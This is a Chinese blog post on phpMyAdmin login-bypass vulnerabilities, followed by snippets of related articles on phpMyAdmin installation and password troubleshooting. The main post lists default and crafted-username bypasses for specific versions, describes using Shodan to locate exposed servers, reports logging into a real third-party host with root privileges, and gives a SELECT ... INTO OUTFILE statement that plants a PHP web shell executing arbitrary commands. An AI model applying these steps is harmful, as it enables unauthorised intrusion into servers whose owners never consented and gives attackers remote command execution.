phpMyAdmin通过密码漏洞留后门文件
- 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
- 版本 2.11.3~2.11.4:用户名
'localhost'@'@"
登陆,无需密码。 - 版本 2.11.9.2:用户名
root
登陆,无需密码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。
地址已手动打码。
http://121.***.*.219:80/
登陆成功(root 权限)。
接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"
点击运行,不出意外便在对方主机留下了一个名为 runme.php
的后门文件。
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对我们的支持。如果你想了解更多相关内容请查看下面相关链接
相关推荐
-
详解phpmyadmin相关配置与错误解决
详解phpmyadmin相关配置与错误解决 缺少mcrypt扩展 sudo apt-get install php5-mcrypt sudo php5enmod mcrypt 检查:/etc/php5/apache2/conf.d/ /etc/php5/mods-available/ 中是否有mcrypt文件 sudo service apache2 restart 开启 任意服务器登陆(访问远程服务器) 在配置文件`etc/phpmyadmin/library/config.default.p
-
phpMyAdmin无法登陆的解决方法
今天安装上phpStudy,默认mysql的密码为空,登陆phpMyAdmin报如下的错误: ①打开phpStudy的mysql控制台,提示输入密码,开始密码为空,直接按回车 ②输入[use mysql],控制台提示[Database changed] ③输入update user set password=PASSWORD('要修改的密码') where user='root'; 控制台提示[Query OK,XXXXXXXXX] ④最后输入[flush privileges;],提交 然后就
-
php集成安装包wampserver修改密码后phpmyadmin无法登陆的解决方法 原创
本文分析了php集成安装包wampserver修改密码后phpmyadmin无法登陆的解决方法,分享给大家供大家参考,具体如下: 一.问题: 今天重装了本机php开发环境,使用了WampServer2.1a-x32集成安装包(之前使用的是appserv-win32-2.5.9集成安装包).顺便安装多版本php运行环境. 安装过程这里不再赘述.(此处wampserver安装在C盘根目录下)安装完毕后因为默认安装没有设置mysql密码,这里就修改了一下mysql密码(具体方法可参考前面的文章<如何修
-
MySql修改密码后phpMyAdmin无法登陆的解决方法
安装wamp集成服务器并配置完成后,点击PhpMyAdmin,就可以进入mysql数据库在线客户端,但是当你修改了mysql管理员root用户密码后再点击将出现以下页面: 错误原因:这是因为修改了mysql密码后phpmyadmin配置文件没有同步更新 解决方法:打开config.inc.php(一般位于wamp/apps/phpmyadmin/下),修改数据库密码(我的数据库密码设置为root,所以此处也要同步),如下图所示 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持
-
CentOs 7.*中配置安装phpMyAdmin的完整步骤记录
前言 CentOs安装配置phpMyAdmin其实非常简单,所谓的安装其实是不存在的,因为phpMyAdmin是php写的嘛,所以只需要下载安装包然后解压之后,简单配置下就可以使用了,下面给他家说下如何正确配置phpMyAdmin 安装: 1.首先在phpMyAdmin官方网站 http://www.phpmyadmin.net/downloads下载源码包,或者通过我们进行下载://www.jb51.net/codes/405261.html ,下载后上传到服务器解压即可,或者通过Linux
-
解决mySQL中1862(phpmyadmin)/1820(mysql)错误的方法
发现问题 之前一直运行的好好的,突然mysql就无法工作了.请求命令后报错误:ERROR 1820 (HY000): You must SET PASSWORD before executing this statement ,使用phpMyAdmin管理工具也无法登录,显示错误:#1862 无法登录 MySQL 服务器 错误解决 进入mysql的服务器中使用mysql指令进行登录及操作. 1.登录mysql:mysql -uroot -proot (root是我的帐号及密码) 2.尝试是否报1
-
phpmyadmin下载、安装、配置教程
本文为大家分享了phpmyadmin下载安装配置教程,供大家参考,具体内容如下 地址:https://www.phpmyadmin.net/ 点击右上角下载按钮 下载得到phpMyAdmin-4.7.0-all-languages.zip 解压到C盘根目录下,重命名为phpMyAdmin,进入该文件夹,找到config.sample.inc.php,改名为config.inc.php,用文本编辑器打开改文件.找到下列代码 $cfg['blowfish_secret'] = '' 改成 $cfg[
-
centos下安装配置phpMyAdmin的方法步骤
centos下安装配置phpmyadmin,我花了二个晚上,郁闷的我不行,配置phpmyadmin简单吧,很简单,我刚工作的时候,就配置过,很顺利,5年后,竟然花了我二个晚上,感觉在centos下有好多陷井,貌似可以走的通,但是进去后,是死胡同.所以做个笔记 一.在phpMyAdmin官方网站http://www.phpmyadmin.net/downloads/下载源码包 cd /usr/local/src wget https://files.phpmyadmin.net/phpMyAdmi
-
利用phpmyadmin设置mysql的权限方法
第一步:登陆root用户. 第二步:新建一个数据表,并且选好排序规则,此处我使用testtable. 第三步:我们新建一个用户输入相关的账户名以及密码就可以. 第四步:我们对刚才添加的用户 testuser 编辑权限: 进入页面之后,我们只需选择按数据库制定权限.全局权限不用勾选. 点击之后会出现一个权限页面,全选执行即可. 此时我们登陆的testuser后看见的就只有testtable库,以及此表的相关操作权限. 总结 以上所述是小编给大家介绍的利用phpmyadmin设置mysql的权限方法
-
PhpMyAdmin 配置文件现在需要一个短语密码的解决方法
新版本的PhpMyAdmin 增强了安全性,需要在配置文件设置一个短语密码.否则进入之后会有"配置文件现在需要一个短语密码."的红色警叹提示. 解决方法: 1.将 phpMyAdmin/libraries/config.default.php中的 $cfg['blowfish_secret'] = ''; 改成 $cfg['blowfish_secret'] = '123456'; (注:其中的'123456′为随意的字符) 2.在phpMyAdmin目录中,打开config.samp
-
Ubuntu 17.10安装phpMyAdmin数据库管理工具配置详解
和Windows下各种双击安装直接使用的数据库管理工具不同,Linux下的数据库管理工具显得有些稍稍复杂.由于版权和收费限制,很多好用的数据库管理工具例如Data Grip和Navicat不能直接在Linux的包管理器中安装使用.不过仍然有一些好用的DBMS,phpmyadmin就是其中之一. 安装LAMP LAMP是Linux.Apache.MySql(MariaDB).PHP(Python.Perl)等软件的合称.我们现在要在Ubuntu16.04上安装,因此只需要安装其他三个软件就可以了.
-
Linux基于php-fpm模式的lamp搭建phpmyadmin的方法
一. 名词简介 1.linux Linux 是免费开源软件,这意味着源代码可用的操作系统. 2. lamp lamp指的Linux(操作系统).ApacheHTTP 服务器,MySQL(有时也指MariaDB,数据库软件) 和PHP(有时也是指Perl或Python) 的第一个字母,一般用来建立web应用平台. 3.mysql mysql 是多线程.多用户的SQL数据库管理系统. mysql 已由Oracle公司自 2010 年 1 月 27 日通过SUN购买.SUN 最初于 2008 年 2
随机推荐
- 简介AngularJS的视图功能应用
- Swift利用AFN实现封装网络请求详解
- Powershell脚本中包含文件资源的例子
- jquery使用animate方法实现控制元素移动
- JavaScript 高级篇之闭包、模拟类,继承(五)
- JavaScript RegExp 正则表达式对象详细说明
- Javascript使用正则验证身份证号(简单)
- javascript实现不同颜色Tab标签切换效果
- 浅谈C#中的常量、类型推断和作用域
- python WindowsError的错误代码详解
- php中删除字符串中最先出现某个字符的实现代码
- SSI指令
- node.js学习之事件模块Events的使用示例
- springmvc4+hibernate4分页查询功能实现
- jquery实现简单手风琴菜单效果实例
- Javascript中的call()方法介绍
- Flask框架的学习指南之制作简单blog系统
- 实例讲解Android中SQLiteDatabase使用方法
- 浅谈ASP.NET常用数据绑定控件优劣总结
- Android实现自动填写获取验证码功能